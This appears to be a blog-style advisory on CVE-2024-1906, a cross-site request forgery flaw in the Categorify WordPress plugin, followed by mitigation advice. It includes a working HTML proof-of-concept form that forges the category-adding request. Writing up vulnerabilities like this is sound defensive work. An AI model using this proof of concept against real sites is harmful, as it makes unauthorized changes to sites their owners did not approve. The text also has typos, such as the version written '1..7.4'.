CVE-2024-1906 - Unauthenticated Cross-Site Request Forgery in Categorify Plugin for WordPress Versions up to 1..7.4

A serious security vulnerability, identified as CVE-2024-1906, has been discovered in the popular Categorify plugin for WordPress. All versions up to, and including, 1..7.4 are affected by this issue. The vulnerability enables unauthenticated attackers to initiate Cross-Site Request Forgery (CSRF) attacks, which could allow them to add categories to the targeted site without proper authorization.

Details

The root cause of this vulnerability is the absence or improper validation of nonce (number used once) in the categorifyAjaxAddCategory function. This inadequate security measure makes it feasible for unauthenticated attackers to send forged requests to the targeted site. If the attackers succeed in tricking a site administrator into performing an action, such as clicking on a link, this vulnerability can be exploited.

Here's a code snippet illustrating how CVE-2024-1906 can be exploited

<!DOCTYPE html>
<html>
<head>
<title>CVE-2024-1906 - CSRF PoC</title>
</head>
<body>
  <h1>CSRF POC</h1>
  <form action="http://targeted-wordpress-site.com/wp-admin/admin-ajax.php"; method="POST">
    <input type="hidden" name="action" value="categorifyAjaxAddCategory" />
    <input type="hidden" name="newCategory" value="Unwanted Category" />
    <input type="submit" value="Click me, admin!" />
  </form>
</body>
</html>

By using the code snippet above, attackers can create a simple HTML file containing a form that, when submitted by an authenticated site administrator, adds a new category named "Unwanted Category" to the target WordPress site.

Original References

1. Categorify plugin Homepage
2. WordPress related vulnerability - OWASP
3. Cross-Site Request Forgery (CSRF) - OWASP

Protection and Mitigation

To protect your WordPress site from the potential exploitation of CVE-2024-1906, it's crucial to, apply the following actions:

Update the Categorify plugin to the latest version.

2. Educate site administrators about potential risks and encourage safe browsing habits (e.g., never clicking on untrusted links or opening files from unknown sources).

Conclusion

CVE-2024-1906 represents a significant security vulnerability in the Categorify plugin for WordPress, affecting all versions up to and including 1..7.4. This post has provided an overview of the issue, including a code snippet that illustrates how the exploit can be executed, links to original references, and suggestions on how to protect and mitigate potential exploitation. By understanding and addressing this vulnerability, you can maintain a secure and robust WordPress site.

Timeline

Published on: 02/27/2024 11:15:08 UTC
Last modified on: 02/27/2024 14:19:41 UTC